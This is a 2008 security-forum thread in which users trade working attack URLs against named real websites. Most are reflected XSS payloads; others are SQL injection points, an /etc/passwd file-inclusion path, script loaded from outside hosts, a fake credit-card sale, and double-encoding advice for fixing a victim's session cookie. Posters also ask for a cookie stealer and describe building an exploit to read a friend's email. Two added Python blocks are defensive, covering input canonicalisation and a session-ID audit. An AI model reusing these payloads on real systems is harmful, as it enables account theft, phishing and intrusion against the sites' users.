Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: Anonymous User
Date: September 02, 2008 08:38AM

This is for hurting admins. Don't hurt admins ;) Here's some more fun stuff about them in German.

http://www.cuil.com/search?q=test&m=%22%27%27%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3EIQ%20Test

Re: So it begins
Posted by: PaPPy
Date: September 02, 2008 04:55PM

cookie stealer for sony station pass anyone?

https://auth.station.sony.com/login?service=%22%3B%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3Ehttps%3A//account.station.sony.com/j_acegi_cas_security_check%26theme%3DuramWeb%26locale%3Den_US

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: Reiners
Date: September 05, 2008 07:57PM

most popular webmail service in germany: gmx.net
http://suche.gmx.net/search/pic/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.gmx.net/search/web/?su=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://suche.gmx.net/search/dir/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.gmx.net/search/LiveSuche/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://produkte.suche.gmx.net/search.do?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

at least as popular as GMX with same problems: web.de
http://suche.web.de/search/web/?su=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://suche.web.de/search/pic/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/dir/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/news/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/software/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://produkte.suche.web.de/search.do?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E



Edited 2 time(s). Last edit at 09/05/2008 08:18PM by Reiners.

Re: So it begins
Posted by: Kyo
Date: September 06, 2008 01:04PM

Oh I wanted to get a friend's emails once and developed a gmx.net one, but then I found out that she uses Thunderbird and never actually logs in...

I wonder if that one still works, it wasn't the same as yours. let me find it...

Re: So it begins
Posted by: PaPPy
Date: September 07, 2008 05:27PM

http://f.uck-you.com/%3Fwho%3D%3Ciframe%20src%3Dhttp%3A//google.com%3E
a site i came across, lol

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: PaPPy
Date: September 20, 2008 10:33AM

http://www.wireless.att.com/global-search/search.jsp?q=%22%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E%26x%3D0%26y%3D0%26searchEngine%3Dg

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: peekay
Date: September 20, 2008 01:21PM

These guys make pharmaceuticals and chemicals... like industrial hydrogen peroxide, the kind used in rocket fuel and terrorist bombs.

http://www.solvay.com/services/searchresult/0,,2276-2-0,00.htm?query=%22%3E%3Cscript%3Ealert('owned');%3C/script%3E



Edited 1 time(s). Last edit at 09/20/2008 01:22PM by peekay.

Re: So it begins
Posted by: Kyo
Date: September 23, 2008 03:09PM

terrorist chemicals you say?


hxtp://www.solvay.com/services/searchresult/0,,2276-2-0,00.htm?query=%22%3E%3Cstyle%3Efont%20{display:none;}%3C/style%3E%3Cscript%3Edocument.getElementById(%27AutoNumber1%27).innerHTML%20=%20%22%3Ch1%3EToday!%20Big%20terrorist%20chemical%20sale!%3C/h1%3EGrab%20%27em%20while%20the%20government%20is%20unaware!%3Cbr%3EJust%20send%20your%20credit%20card%20information%20to%20notascam@aol.com%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cdiv%20style=display:none%3Ea%22;%3C/script%3E%3Ca%20x=%22



Edited 1 time(s). Last edit at 09/23/2008 03:10PM by Kyo.

Re: So it begins
Posted by: PaPPy
Date: September 23, 2008 05:34PM

above doesn't work in IE7, but does in FF3

http://www.xssed.com/archive/author=PaPPy/

Re: So it begins
Posted by: Kyo
Date: September 27, 2008 02:56PM

http://pbfcomics.com/?cid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Re: So it begins
Posted by: Anonymous User
Date: September 28, 2008 09:32AM

http://sex.de/main.php?main=%22%3Cscript%20src=//h4k.in%3E

Re: So it begins
Posted by: Kyo
Date: September 29, 2008 01:25PM

what were you doing on that site?!

Re: So it begins
Posted by: thrill
Date: September 29, 2008 01:36PM

He was reading the articles.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: So it begins
Posted by: id
Date: September 29, 2008 04:23PM

What exactly is oroanal contact?

-id

Re: So it begins
Posted by: Anonymous User
Date: September 29, 2008 05:30PM

@id: you definitely do not wanna know

@thrill: research for my homework

Re: So it begins
Posted by: Anonymous User
Date: October 15, 2008 02:50AM

http://www.123people.com/s/HASH(0x%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E537e740)/United+States

Dunno if we had that one already...

Re: So it begins
Posted by: C1c4Tr1Z
Date: October 15, 2008 10:14AM

This is something weird..

hxxps://addons.mozilla.org/en-US/firefox/search?q=%C0%22%20onmouseover=alert(/xss/.source)%20\&cat=all

Tested on FF 3.0.3 (UTF-8)

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Re: So it begins
Posted by: DoctorDan
Date: October 15, 2008 07:51PM

Wow, cicatriz! Unexpected and interesting find!

Re: So it begins
Posted by: DoctorDan
Date: October 15, 2008 07:53PM

Wow, cicatriz! Unexpected and interesting find!
This may be of some help in explanation: http://wikisecure.net/articles/uri-encoding-to-bypass-idsips/

Re: So it begins
Posted by: tx
Date: October 16, 2008 12:19PM

http://my.att.net/s/s.dll?num=10&spage=search/resultshome1.htm&searchType=web&string=att&where=*/%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3B/*&sm.x=0&sm.y=0&sm=Go

EDIT: AT&T makes phishing easy: https://uversecentral1.att.com/uvp/home/explore?umaurl=:a@google.com%3F

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/16/2008 12:44PM by tx.

Re: So it begins
Posted by: C1c4Tr1Z
Date: October 17, 2008 07:40AM

Thanks DoctorDan!
I'll read it. I've found this also:

http://applesoup.googlepages.com/bypass_filter.txt

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Re: So it begins
Posted by: iNs4n3
Date: October 21, 2008 11:54PM

this is probably my favourite:

http://ha.ckers.org_xss.js.sapo.pt that translates to... http://pesquisa.sapo.pt/?q=ha+ckers+org+xss+js

:P



Edited 1 time(s). Last edit at 10/21/2008 11:58PM by iNs4n3.

Re: So it begins
Posted by: euronymous
Date: October 22, 2008 12:47PM

Hi guys

I'm finally ready to post some vulnerabilities that I've found lazily browsing the web, for fun/profit.

Enjoy them.

-- Italian Hosting --
http://www.hosty.it/index.jsp?sezione=registrazione_dominio_step1&dominio=%3CScripT%3Ealert%286%29%3C%2FScripT%3E&estensione=.it&opzione=REG_DOM [reflected XSS]

--- Goa/Trance world known service ---
http://217.160.136.176/cgi-bin/search.cgi [reflected XSS in the search bar]

-- Deputati DS, political web site (anyway I'm with them, not with Berlusconi)
http://www.deputatids.it [reflected XSS in search bar]
http://www.deputatids.it/Select.asp?Section=Deputato&ID=%27 [sql injection]

-- Supermicro--
http://www.supermicro.com/wheretobuy/europe.cfm?rgn=115&cmp=%27 [actually they put in some WAF, anyway the vulnerability was exploitable some weeks ago]

-- Atlantis, italian router manufacturer
http://www.atlantis-land.com/ita/prodotti.php?l1=%27&l2=%27 [weird error]

--Mps Italia, mobile phone services
http://www.mpsitalia.com/index.php?notizia=3 [confirmed sql injection in the "notizie" parameter]

-- Toshiba
http://aps2.toshiba-tro.de/wlan/?page=../../../../etc/passwd [include bug, needs to be refined :)]

+++eat, fuck, hack+++

Re: So it begins
Posted by: C1c4Tr1Z
Date: October 22, 2008 04:21PM

And, Kodak:

http://www.kodak.com/global/en/service/products/ekn035324.jhtml?pq-path=12998%22;alert(0),foo=%22

http://www.kodak.com/eknec/PageQuerier.jhtml?pq-path=204&pq-locale=es_AR&successURI=%22%3E%3Cimg/src/onerror=%22alert(%27xss

@euronymous:

http://demodms.hosty.it/index.php?redirection=%22%3E%3Ciframe/src=%22javascript:alert(%27XSS%27)

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]



Edited 1 time(s). Last edit at 10/22/2008 04:25PM by C1c4Tr1Z.

Re: So it begins
Posted by: luckymurari
Date: October 25, 2008 02:36AM

@eurodynams


http://aps2.toshiba-tro.de/wlan/?page=../index An infinite loop. May break your browser :)

Re: So it begins
Posted by: Anonymous User
Date: October 29, 2008 10:22AM


Re: So it begins
Posted by: lightos
Date: October 30, 2008 04:00AM

I found this one some time ago http://www.zorpia.com/email/optout/<BODY%20ONLOAD=alert(document.cookie)%3E

Almost managed to create a fixed session with http://zorpia.com/email/optout/%3CMETA%20HTTP-EQUIV=%22Set-Cookie%22%20Content=%22zorpia_session=abc%3Bpath=%2F%3Bexpires=0%22%3E .. only thing holding me back is setting the path to '/'
The filter replaces / with </b>. Would anyone know a way around this?

Re: So it begins
Posted by: Anonymous User
Date: October 30, 2008 08:55AM

try double encoding - and don't forget to set the domain right :)

%22Set-Cookie%22%20Content=%22zorpia_session=abcdefg%3Bpath=%252F%3Bdomain=.zorpia.com%3Bexpires=0%22%3E

Options: ReplyQuote
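
The server-side counterpart to the double-encoding exchange above and to the `%C0` byte in the earlier addons.mozilla.org post, as an added example that is not part of the original thread: decode a reflected value to a fixed point, refuse layered encoding and malformed UTF-8, and HTML-escape whatever is echoed. Function names, the `q` field and the sample values are assumptions made for illustration.

```python
import html
from urllib.parse import unquote_to_bytes


def encoding_depth(raw, limit=5):
    """Count percent-decoding rounds until the value stops changing."""
    data, depth = raw.encode("utf-8"), 0
    while depth < limit:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, depth = decoded, depth + 1
    return depth


def canonicalize(raw):
    """Decode exactly one layer; refuse anything that is not canonical."""
    if encoding_depth(raw) > 1:
        # %252F -> %2F -> / : a second layer only helps input get past a
        # filter that decodes once and then hands the value on.
        raise ValueError("multiple percent-encoding")
    try:
        # Strict decoding rejects bytes such as 0xC0, which never occur in
        # well-formed UTF-8, instead of letting a later layer guess at them.
        return unquote_to_bytes(raw).decode("utf-8", "strict")
    except UnicodeDecodeError:
        raise ValueError("invalid UTF-8") from None


def render_echo(raw):
    """Echo a request value into an HTML attribute with output encoding."""
    value = canonicalize(raw)
    return '<input name="q" value="%s">' % html.escape(value, quote=True)


def classify(raw):
    """Return 'ok' or the rejection reason, e.g. for a log line."""
    try:
        canonicalize(raw)
        return "ok"
    except ValueError as exc:
        return str(exc)


# Constructed samples, reduced from values quoted in the thread.
SAMPLES = ["%22%3E%3Cb%3E", "path=%252F", "%C0%22%20x", "IQ%20Test"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s, "->", classify(s))
    print(render_echo(SAMPLES[0]))
```

Rejecting layered encoding is defence in depth; the `html.escape` call is what keeps the reflected value from closing the attribute it is written into.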
Re: So it begins
Posted by: lightos
Date: October 30, 2008 04:53PM

Thanks Mario, very much appreciated!

Here's something to laugh/cry about.
This site claims to be "100% secure". It also has a "Verified Secure Certification Seal" which seems to be pretty useless, check it out.

XSS:
http://www.rockler.com/search_results.cfm?filter=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E

Also generates weak session IDs:
55851486
55851489
55851496
55851497


The rockler.com Verified Secure Certification seal has been validated and is authentic. The Verified Secure scanning system actively searches this website for thousands of known vulnerabilities defined by the Payment Card Industry Data Security Standards scanning guidelines. You can shop in confidence knowing that rockler.com is taking precautions to help keep your personal information secure.

PCI DSS scanning guidelines that can't detect a simple XSS?

Just goes to show how insecure things really are.

Options: ReplyQuote
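
A check a site owner could run over a sample of its own issued session IDs, using the four values quoted in the post above. This is an added example, not part of the original post; the function names and the `max_step` threshold are assumptions.

```python
import math
import secrets

# The four session IDs quoted in the post above, in the order listed.
OBSERVED = ["55851486", "55851489", "55851496", "55851497"]


def audit_session_ids(samples, max_step=1000):
    """Summarise how predictable a sample of issued session IDs is."""
    report = {"numeric": all(s.isdigit() for s in samples)}
    if not report["numeric"] or len(samples) < 2:
        return report
    values = [int(s) for s in samples]
    steps = [b - a for a, b in zip(values, values[1:])]
    report["steps"] = steps
    # Small, always-positive steps point to one global counter: every
    # visitor's ID sits a few values away from every other visitor's.
    report["counter_like"] = all(0 < d <= max_step for d in steps)
    span = max(values) - min(values) + 1
    report["span"] = span
    # Bits of uncertainty about an ID issued inside the sampled window.
    report["window_bits"] = round(math.log2(span), 1)
    return report


def new_session_id(nbytes=32):
    """Replacement: an ID from the OS CSPRNG with 8 * nbytes bits of entropy."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    print(audit_session_ids(OBSERVED))
    print(audit_session_ids([new_session_id(), new_session_id()]))
```

For the quoted values the audit reports steps of 3, 7 and 1 across a span of 12, under four bits of uncertainty, against 256 bits for the replacement token.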
Re: So it begins
Posted by: Kyo
Date: November 01, 2008 03:49AM

Yeah, most of these scans don't check for XSS
